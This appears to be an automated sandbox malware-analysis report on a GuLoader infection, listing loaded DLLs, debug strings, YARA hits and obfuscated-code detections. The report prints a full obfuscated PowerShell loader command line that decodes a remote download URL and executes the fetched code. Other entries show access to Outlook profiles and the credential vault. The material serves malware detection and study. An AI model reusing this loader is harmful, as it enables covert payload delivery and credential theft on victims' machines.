          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptdlg.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msoert2.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msftedit.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptdlg.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msoert2.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msftedit.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbu] source: powershell.exe, 00000006.00000002.2221760380.00000000075A5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wabmig.pdbGCTL source: ktmutil.exe, 0000000C.00000002.2980525001.0000000000813000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: embly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbL/d source: powershell.exe, 00000001.00000002.2402315774.000001F2B7850000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wabmig.pdb source: ktmutil.exe, 0000000C.00000002.2980525001.0000000000813000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: osqpHpjBCXXA.exe, 0000000B.00000002.2979840816.00000000009CE000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000001.00000002.2399198190.000001F2B75CB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: wabmig.exe, 0000000A.00000003.2332183560.00000000215EF000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2334544648.000000002179A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 0000000C.00000003.2431520308.0000000002C26000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32h.B source: powershell.exe, 00000001.00000002.2402315774.000001F2B789F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wabmig.exe, wabmig.exe, 0000000A.00000003.2332183560.00000000215EF000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2334544648.000000002179A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 0000000C.00000003.2431520308.0000000002C26000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: ktmutil.pdbGCTL source: wabmig.exe, 0000000A.00000002.2434687494.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434687494.0000000005E71000.00000004.00000020.00020000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000002.2980927526.0000000001288000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ktmutil.pdb source: wabmig.exe, 0000000A.00000002.2434687494.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434687494.0000000005E71000.00000004.00000020.00020000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000002.2980927526.0000000001288000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb source: powershell.exe, 00000001.00000002.2400865654.000001F2B7654000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          VBScript performs obfuscated calls to suspicious functions
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("Powershell.exe", ""<#Debrief klargoeringstekniker overmor", "", "", "0");
          Yara detected GuLoader
          Source: Yara matchFile source: 00000006.00000002.2229243853.0000000009BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2218750416.000000000596A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2228656875.0000000008900000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64string($Tarsonemid)$global:bolchernes = [system.Text.Encoding]::AsCII.Getstring($Tumlen)$global:Ccilius=$bolchernes.substring($Disingenious,$Rygte)<#Velate Bredtfavnendes Systemise Viceforma
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Unbog $Projektlederen $Profitableness), (Manifestets @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Sulamith = [AppDomain]::CurrentDomain.GetAssemblies()$
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Luftigheder)), $Depositions).DefineDynamicModule($Faktureringsadressen, $false).DefineType($Fordelte, $Anerkendte, [System.MulticastDe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64string($Tarsonemid)$global:bolchernes = [system.Text.Encoding]::AsCII.Getstring($Tumlen)$global:Ccilius=$bolchernes.substring($Disingenious,$Rygte)<#Velate Bredtfavnendes Systemise Viceforma
          Obfuscated command line found
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMCla
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaJump to behavior
          Suspicious powershell command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. 